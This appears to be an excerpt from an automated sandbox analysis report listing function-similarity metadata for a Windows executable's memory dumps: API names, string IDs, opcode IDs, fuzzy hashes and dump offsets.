                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCloseCountGlobalMessagePeekTickWire
                                                                                                                                                                              • String ID: Jumps cannot exit a FINALLY block.$MZ@$o$p$p
                                                                                                                                                                              • API String ID: 1628889810-1267260696
                                                                                                                                                                              • Opcode ID: 10725f0d54f7ea3174d85150bd355fc8fff31ac4b9f596eb94979921d08697af
                                                                                                                                                                              • Instruction ID: 6408a75655731cee4c89b8ba28a4b46e828c2701104e533e5788450dda7c7bea
                                                                                                                                                                              • Opcode Fuzzy Hash: 10725f0d54f7ea3174d85150bd355fc8fff31ac4b9f596eb94979921d08697af
                                                                                                                                                                              • Instruction Fuzzy Hash: 58F15C72704B408AFB66CB2AE4903E927A1F74DBD4F54412AEB5987AB5DF38CD81C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCloseCountGlobalMessagePeekTickWire
                                                                                                                                                                              • String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$MZ@$Target label does not exist.
                                                                                                                                                                              • API String ID: 1628889810-1182089384
                                                                                                                                                                              • Opcode ID: 37abcf2fc07e0d9d5306928813b07e2330aa74609225d583a4067ddc574f8ce4
                                                                                                                                                                              • Instruction ID: dfb8b4a533078902b985740af981d1f4d02d624242c14cb926da29ee495ef38d
                                                                                                                                                                              • Opcode Fuzzy Hash: 37abcf2fc07e0d9d5306928813b07e2330aa74609225d583a4067ddc574f8ce4
                                                                                                                                                                              • Instruction Fuzzy Hash: 95D15A72714A4086EBA6CB2BE5903E923E1F74DBD4F54412AEB5987AB4DF38CC91C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCloseCountGlobalTickWire
                                                                                                                                                                              • String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$MZ@
                                                                                                                                                                              • API String ID: 670262367-2280719295
                                                                                                                                                                              • Opcode ID: aef0ef23336d108aa99a6b08a98fcf9d3653809fd91ea1473881a113cd57651f
                                                                                                                                                                              • Instruction ID: 133c476e1d0895eb5d1dd7d0cf87f647f6be5d67875812059295705e2d17ad93
                                                                                                                                                                              • Opcode Fuzzy Hash: aef0ef23336d108aa99a6b08a98fcf9d3653809fd91ea1473881a113cd57651f
                                                                                                                                                                              • Instruction Fuzzy Hash: D9D16AB2701A4086EB66DB2BE5903E927E1F74DBD4F54412AEB5987AB5DF38CC81C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCloseCountGlobalInfoTickWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 2938037875-2978689999
                                                                                                                                                                              • Opcode ID: 7b9ccd575cc6379d1c87cb9e43bcb85668a5810824061fdac06ee1b393ad01ca
                                                                                                                                                                              • Instruction ID: b5664b9d1fa94c60f95198abfba41842bb8c870c74c77b610e2a48b1582d70f8
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9ccd575cc6379d1c87cb9e43bcb85668a5810824061fdac06ee1b393ad01ca
                                                                                                                                                                              • Instruction Fuzzy Hash: DCD12F72614B408AEB66DF2AE8843D937A1F74D7D8F50421AEB9987BF5DB38C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCountTick$ClipboardGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 1928398982-2978689999
                                                                                                                                                                              • Opcode ID: a71d1c84c710a2b9291b268e1668ab81f82fea8be2974e81a778211ed9a76d53
                                                                                                                                                                              • Instruction ID: 63273e95ddd893f0d1bf9cabbb5a04a0e30bf8e665f06e222939cd05404f47d8
                                                                                                                                                                              • Opcode Fuzzy Hash: a71d1c84c710a2b9291b268e1668ab81f82fea8be2974e81a778211ed9a76d53
                                                                                                                                                                              • Instruction Fuzzy Hash: F4B11C72604B408AEB56DB6BE8843D937E1F34DBD4F54412AEB9987BB5DB38C891C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: CSV$MZ@
                                                                                                                                                                              • API String ID: 2223778145-3025936924
                                                                                                                                                                              • Opcode ID: e449492d15172af671787ee93ecff4c780cedaeb6369828dc9e2f9a8c0b0a8a6
                                                                                                                                                                              • Instruction ID: fd3e982d695879213dcd4efd1a1d0a6e967e65728d572bd63d95787c35c76bea
                                                                                                                                                                              • Opcode Fuzzy Hash: e449492d15172af671787ee93ecff4c780cedaeb6369828dc9e2f9a8c0b0a8a6
                                                                                                                                                                              • Instruction Fuzzy Hash: A4A15DB1704B4086EB66CB2BE8803E937E1F34DBD4F54421AEB9987AB5DB38C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                                              • Opcode ID: 24eba0ec0c075d75d0a5c8eeb815f49741bbc48676be5e398f9f3b338f8d23c6
                                                                                                                                                                              • Instruction ID: 0e04bc5879f625341ba08d040bfcb54e3f8489371c56cef55d4ddf1e76f7d51e
                                                                                                                                                                              • Opcode Fuzzy Hash: 24eba0ec0c075d75d0a5c8eeb815f49741bbc48676be5e398f9f3b338f8d23c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 80C1BB32724E408AEB558FA6D4917EC37B1E389BE8F015219EF2A5B7E6DB38C015C300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: d20b54f11840a222cc92b97bd43070f85f49f34ea6427f488d0dc40c5b56ccf4
                                                                                                                                                                              • Instruction ID: b08244215024417e093408eabe51826c2d89fc0bdcb5475e09bb2ddf85b3d868
                                                                                                                                                                              • Opcode Fuzzy Hash: d20b54f11840a222cc92b97bd43070f85f49f34ea6427f488d0dc40c5b56ccf4
                                                                                                                                                                              • Instruction Fuzzy Hash: BAE16E72604B808AE766CB6AE8443E977E1F74CBD4F54422AEB9983BB5DB34CD51C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: aa28be4d2e1a4a0680ceb63b2f7a9c785f296464fe7ee8d0ad71e7d7d362109a
                                                                                                                                                                              • Instruction ID: 7ca6f43e94cfd05807c40a72f7ad625cfd542d84cb84c80722a01e77b1443252
                                                                                                                                                                              • Opcode Fuzzy Hash: aa28be4d2e1a4a0680ceb63b2f7a9c785f296464fe7ee8d0ad71e7d7d362109a
                                                                                                                                                                              • Instruction Fuzzy Hash: CEA13D71604B8086EB66CB2BE9843E937E1F34DBD4F54421AEB9987AB5DB38C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$FileFind$ClipboardCloseFirstGlobalMessageNextPeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 1514775855-2978689999
                                                                                                                                                                              • Opcode ID: fb3aa0bc897e0c9c961935b0ca7b8927761fb37b680a0d3216ecf55ac4f40105
                                                                                                                                                                              • Instruction ID: b1011a9cedaf87c0b737732ad7256eaea8551987a0ad50ab3cdf1c056dfbafdb
                                                                                                                                                                              • Opcode Fuzzy Hash: fb3aa0bc897e0c9c961935b0ca7b8927761fb37b680a0d3216ecf55ac4f40105
                                                                                                                                                                              • Instruction Fuzzy Hash: BDA13CB1604B8086EB66DB2BE9803D937E1F34DBD4F54421AEB9987BB5DB34C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: 2a0879cb26b61ffa3b6ba921dfcb40fc9737490f814f6fa01de604188b4ae38c
                                                                                                                                                                              • Instruction ID: 6818b8c62adde42bb751f432f939081dde9776461cc39f90827d7f982495d5c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 2a0879cb26b61ffa3b6ba921dfcb40fc9737490f814f6fa01de604188b4ae38c
                                                                                                                                                                              • Instruction Fuzzy Hash: 50A13C71604B8086EB66CB6BE9843E937E1F34DBD4F54421AEB9987BB5DB38C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: df55a71ba918d09a6c0341784bb4b6df6fee653ad5183ac193da78b06c3a717f
                                                                                                                                                                              • Instruction ID: ec59d67dd8e0bcac62b431d342fe7a8dc72599e435d02df47adaa873fe52caee
                                                                                                                                                                              • Opcode Fuzzy Hash: df55a71ba918d09a6c0341784bb4b6df6fee653ad5183ac193da78b06c3a717f
                                                                                                                                                                              • Instruction Fuzzy Hash: 51A13DB1704B4086EB66CB6BE9843E937E1F34DBD4F54421AEB9987AB5DB34C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$ClipboardCloseGlobalMessagePeekWire
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 849950280-2978689999
                                                                                                                                                                              • Opcode ID: 4c2a0f0b9636227887219dd18b533bb99c686f22abcbd621c92328b20fc573e8
                                                                                                                                                                              • Instruction ID: 5e7af6687472f7778d4718a4b2b364bf4d22fe1c4c1d33568b647f9ae5402526
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c2a0f0b9636227887219dd18b533bb99c686f22abcbd621c92328b20fc573e8
                                                                                                                                                                              • Instruction Fuzzy Hash: BDA14CB1704B4086EB66CB6BE9843E937E1F34DBD4F54422AEB9987AB5DB34C851C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$Message$PostTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3009163648-0
                                                                                                                                                                              • Opcode ID: 77e5bdd54f257c9e174b2bc44ddfae568eccae59172696b476d1b1fd7f4d874b
                                                                                                                                                                              • Instruction ID: ca448e0bf649282658e7eb1253a2044d493c545ef039d3bf36e2a17d050d3b85
                                                                                                                                                                              • Opcode Fuzzy Hash: 77e5bdd54f257c9e174b2bc44ddfae568eccae59172696b476d1b1fd7f4d874b
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B81BFB26057818AFB27CF26A4947E927E1BB8DBC4F180129FB4907AB5DB78C441DB41
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$CloseFirstModuleName
                                                                                                                                                                              • String ID: %s\%s$C:\Users\user\Desktop$Out of memory.
                                                                                                                                                                              • API String ID: 551415897-80433629
                                                                                                                                                                              • Opcode ID: 89721830dc247782bd175d41346b8f9cb47f51ada5edf2b305f010aae31f85d4
                                                                                                                                                                              • Instruction ID: 68fc07b35f8a21eff1fa008abd8fd3d1cc5b0ea6f457d46f2f324537401f896a
                                                                                                                                                                              • Opcode Fuzzy Hash: 89721830dc247782bd175d41346b8f9cb47f51ada5edf2b305f010aae31f85d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C819232225B8081EA66DB12E4507DA63A4FB587E4F846311FF7A4BBF5EB39C605C340
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                              • Opcode ID: 87f029c61b1964b5d3d051b045c626caeb3c531624b754c86345cd830e94cf12
                                                                                                                                                                              • Instruction ID: e75311ff11c13882f58586ecfa224e83cca43f2916b942fe5c68605d346f9b3e
                                                                                                                                                                              • Opcode Fuzzy Hash: 87f029c61b1964b5d3d051b045c626caeb3c531624b754c86345cd830e94cf12
                                                                                                                                                                              • Instruction Fuzzy Hash: DC819B32620E5189F722AFAB98907EE27B1B388BC9F444665EF0A577F5CB34C446C710
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
